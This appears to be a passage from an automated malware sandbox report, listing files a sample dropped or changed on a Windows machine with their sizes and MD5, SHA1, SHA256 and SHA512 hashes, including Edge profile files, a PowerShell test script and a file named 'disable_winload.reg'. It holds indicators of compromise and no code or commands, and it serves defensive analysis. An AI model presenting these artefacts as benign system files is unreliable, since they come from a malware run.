SHA11c9e4619ec787ceb528db5cb281bce3e3dd61252
SHA2566de3c7829033dec610557e71877a579f5cea2f803d49eb732b8b9071026035c0
SHA51266e54840862f0dcf96e4665eae60a20d08ab892d5a7bf9c6f2097dd080d5efd9a81300d9a26a85ab0cf6b2be20962b59cff71cdb603265bf06db6993f52ae294
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5d31ccda0502729c0f96231e5d4b9d65c
SHA10e6f08af5b101893a5e0b8a8d362fb441b0040a1
SHA2562039efb6072cb7cbe2a32e101b3091cc57f4185911f0262e6f4c0f4d2e1494d7
SHA5128f7fc375a8eae648a4bedde494a728f9ce9ada23d6a4dc8c361f3ff8e8e095005bd91948dc44c38042438c7f88d0e3fc9d75d5a4d3d75b71ac7cf2b3c383c9d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD54a629e54898a161d9457e859782bc33b
SHA1edfc1d1a64b8afb3414280f2da53a235be703d1c
SHA256ca05dd8dcab2a74292cad2a04adc84256c9725854eba6936e55c2419d9b8dab0
SHA512adf07feec01d3ef60f4807a2ba8ba96a9f4f8ffafbce4ca0964245ce59c6350f74590e96474ad33fcabcbdaa613373ca15a4a2440f86f74c43a9d916d4dfd1f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD530ad785b71f0aa3af2f0c51d5f98dd9d
SHA1db47869f74b93e60936b8f83b3e280643bb5257e
SHA2566822c0a82743d54ce0b373a1dc238f7e1a6f000257d9375c9dc10254c22b6372
SHA512abe167b4dbf2340048673c2bc68dfae373ee6a53eae97b931cb2d8d4f0c0fa61dda8b1a32c667033ce3a742a9ba37a6209d3cb43942fec0924df030ab4e8abb9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD53f21b841f2072334be968e8a00a947df
SHA13ad11962ebd89036fe53992f50888f36b1d5d429
SHA256f52d46db6f650083463f3718dd0e37bcb0b3b180a35093ffce1829c34ed7dbcf
SHA51265ec25508077426c303895c53574030bb201095eaf13ed01b146ba8e4169c5d57fd98a03fdf02347f966a8e28bc6c4f9b4f249316d6fd8edd18ef077cdbbdfce
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD520a446ac65dc41fc00a35876bc78092b
SHA1d932f3796b19edc46f04babfe1ea1aa221fe1e5a
SHA256a76d986ca89b33941d564b107dcd6f33e03e2ede981d26d361e5e861e1cadc50
SHA5127836f9123171899dccb6d9c58552de63cc3a7182ad5ed7165bbcf306c88e01963081b0b2c99d3741f94898f9f8aee6174164462ab98be22dbdbe2596952db6fb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5a842a9ba21eb7c18d5ddd2995c838320
SHA187a6160e52486e622132d1a19ffd146173b5db59
SHA25669ed109191e7e9617b93ce785412c0802a269ff3dc8ac5b23efae43e14edd2de
SHA51207d1a70eef8ce7112a861ea5b11a2708c58516f59330259a9ec9122c332b85f329d63f354a0c539cd0d4260aa47557fba29498a8cab40c29812616b9f8b3951e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa8efa56e1e40374bbd21e0e469dceb7
SHA133a592799d4898c6efdd29e132f2f76ec51dbc08
SHA25625eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bpu3xaqx.2so.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.dbFilesize
1024KB
MD594194e2fa69ff276dc002efb0f8abcb6
SHA1701f2598e03e52079e6cdc7447b0599074cd0b16
SHA256b7c138f85c20298bdffca80a05ce874ee1456093b003a88c839031f2f21549cc
SHA512ee89547299c1c9b0bc9288872cde385ebe60195444644551290a660bc7471802b7ace97565bfcde6d525e84aed05727855ef49b97c27d38403490a4ca4f677a5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
7KB
MD583d0f9f348182309763ee1ccf371bfc6
SHA11bdeab33c57933dcdc7aeebde33daf840278a43f
SHA2564ec103ac2a883e56fa40b536de331ddf1431a3937e7aa54b2b1cbc3c912e16f6
SHA5127a06900f29fbde70dde1105a538ec60d5aca4cccaa70e55880365615daf8a4eb5d7e51abe6a96a45103bd8f86aafe9044eada9732095b04d6e873d83fabd597d
-
\??\pipe\LOCAL\crashpad_2236_BVVCPOGJSIEWSPNFMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/6072-78-0x000001F97F7B0000-0x000001F97F7D2000-memory.dmpFilesize
136KB